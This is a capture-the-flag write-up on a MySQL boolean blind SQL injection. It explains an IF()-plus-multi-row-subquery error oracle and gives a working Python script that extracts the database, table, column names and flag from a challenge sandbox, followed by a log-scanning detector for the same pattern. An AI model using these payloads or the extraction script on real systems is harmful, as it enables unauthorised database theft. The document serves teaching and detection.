CTFHub Boolean blind note

The challenge is labelled Boolean blind injection. On inspection, the injected parameter is not quoted (nothing needs to be closed), but some filtering is in place. It looks like a basic problem, but the response does not behave as expected:
payload: ?id=1 and 's'='p'
The response is still query_success.
This challenge differs from the usual Boolean blind injection. In the usual case (I have not done many either), the page differs depending on whether the query result is empty or the statement raises an error, and the error is echoed back. Here the page returns query_success whether the query result is empty or not; only when the statement itself raises an error does the response change.

This can be confirmed in the SQL command-line interface provided with the challenge:

So the usual and-based Boolean blind payloads are not usable here, because they rely on telling an empty result set from a non-empty one.
So I turned to MySQL's IF() function.

IF(expr1, expr2, expr3): if expr1 is true, expr2 is evaluated; if expr1 is false, expr3 is evaluated.

Then the condition goes in expr1, a syntactically valid SQL fragment in expr2, and a syntactically invalid one in expr3:
payload:

?id=if(1=1,1,union select)
?id=if(1=2,1,union select)

The idea is good, but reality is cruel:
MySQL parses the whole statement before executing it, so a syntax error in expr3 makes the query fail regardless of the value of expr1, and the branch that is never evaluated still breaks the statement.
Searching Baidu at this point turned up nothing useful.
That led me to think of subqueries.

Subquery format: select * from users where id=(select username from users);

A scalar subquery has a requirement: its result must be exactly one row, otherwise MySQL raises an error. The important difference is that this error occurs at execution time, not at parse time, so the statement is syntactically valid and expr3 only fails when IF() actually evaluates it.
payload:

?id=if(1=1,1,(select table_name from information_schema.tables))
?id=if(1=2,1,(select table_name from information_schema.tables))

With the probe placed in expr1, the first letter of the database name turns out to be s.
I ran the rest with a Python script, semi-automatically; it is a bit slow, about 2 minutes in total.

import requests

urlOPEN = 'http://challenge-80bbba4d1e9ce716.sandbox.ctfhub.com:10080/?id='
mark = 'query_success'                  # echoed only when the query runs without error
charset = 'sqcwertyuioplkjhgfdazxvbnm' # lowercase letters, likeliest ones first

def database_name():
    name = ''
    for j in range(1, 9):               # at most 8 characters
        for i in charset:
            url = urlOPEN + 'if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))' % (j, i)
            r = requests.get(url)
            if mark in r.text:          # no error: the guessed character is right
                name = name + i
                print(name)
                break
    print('database_name:', name)

database_name()

def table_name():
    names = []
    for k in range(0, 4):               # first 4 tables of the current database
        name = ''
        for j in range(1, 9):           # at most 8 characters per name
            for i in charset:
                url = urlOPEN + 'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (k, j, i)
                r = requests.get(url)
                if mark in r.text:
                    name = name + i
                    break
        names.append(name)
    print('table_name:', names)

table_name()

def column_name():
    names = []
    for k in range(0, 3):               # first 3 columns of table flag
        name = ''
        for j in range(1, 9):           # at most 8 characters per name
            for i in charset:
                url = urlOPEN + 'if(substr((select column_name from information_schema.columns where table_name="flag" and table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (k, j, i)
                r = requests.get(url)
                if mark in r.text:
                    name = name + i
                    break
        names.append(name)
    print('column_name:', names)

column_name()

def get_data():
    name = ''
    for j in range(1, 50):              # at most 49 characters
        for i in range(48, 126):        # printable ASCII from '0' to '}'
            url = urlOPEN + 'if(ascii(substr((select flag from flag),%d,1))=%d,1,(select table_name from information_schema.tables))' % (j, i)
            r = requests.get(url)
            if mark in r.text:
                name = name + chr(i)
                print(name)
                break
    print('value:', name)

get_data()

Fix it!
The key to this challenge is finding statements that have no syntax error but still fail at execution time. For example, a UNION SELECT must have the same number of columns as the preceding query, which is why I chose a scalar subquery that returns more than one row instead.
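From the server side, the script above looks like hundreds of requests whose id parameter has the shape IF(probe, 1, (SELECT ... FROM ...)). As an added defender-side example that is not part of the original writeup, the following scans constructed access-log lines (hypothetical IPs, hypothetical path, constructed for this example) for that runtime-error oracle shape and counts probes per source address:

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the writeup). Spaces and quotes
# in the id parameter are URL-encoded as a browser or requests would send them.
# Host, path and IP addresses are hypothetical.
SAMPLE_LOG = """\
10.0.0.5 - - [22/Feb/2020:22:50:01 -0500] "GET /?id=1 HTTP/1.1" 200 512
10.0.0.9 - - [22/Feb/2020:22:50:02 -0500] "GET /?id=if(substr(database(),1,1)%3D%22s%22,1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 512
10.0.0.9 - - [22/Feb/2020:22:50:02 -0500] "GET /?id=if(substr(database(),1,1)%3D%22q%22,1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 498
10.0.0.9 - - [22/Feb/2020:22:50:03 -0500] "GET /?id=if(ascii(substr((select%20flag%20from%20flag),1,1))%3D99,1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 498
10.0.0.7 - - [22/Feb/2020:22:51:00 -0500] "GET /?id=2 HTTP/1.1" 200 515
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "GET (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# The oracle shape from the writeup: IF(<condition>, <harmless>, (SELECT ... FROM ...)),
# a syntactically valid subquery that only errors when the false branch is evaluated.
ORACLE_RE = re.compile(r'\bif\s*\(.*?,\s*\(\s*select\b.*\bfrom\b', re.I | re.S)
PROBE_RE = re.compile(r'\b(substr|substring|ascii|mid)\s*\(', re.I)
SCHEMA_RE = re.compile(r'information_schema\.', re.I)

def classify_request(path):
    """Return the indicator names found in one URL-decoded request path."""
    decoded = unquote_plus(path)
    hits = []
    if ORACLE_RE.search(decoded):
        hits.append('if_subquery_oracle')
    if PROBE_RE.search(decoded):
        hits.append('char_probe')
    if SCHEMA_RE.search(decoded):
        hits.append('information_schema')
    return hits

def scan_log(text):
    """Count requests carrying the IF/subquery oracle per source IP; returns {ip: count}."""
    counts = Counter()
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and 'if_subquery_oracle' in classify_request(m['path']):
            counts[m['ip']] += 1
    return dict(counts)

if __name__ == '__main__':
    print(scan_log(SAMPLE_LOG))
```

A single hit is worth a look; a source that produces dozens per minute, all with the same subquery tail and differing only in the probed position or character, is the per-character loop above in progress.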


Tags: Database SQL MySQL Python

Posted on Sat, 22 Feb 2020 22:57:42 -0500 by Toxinhead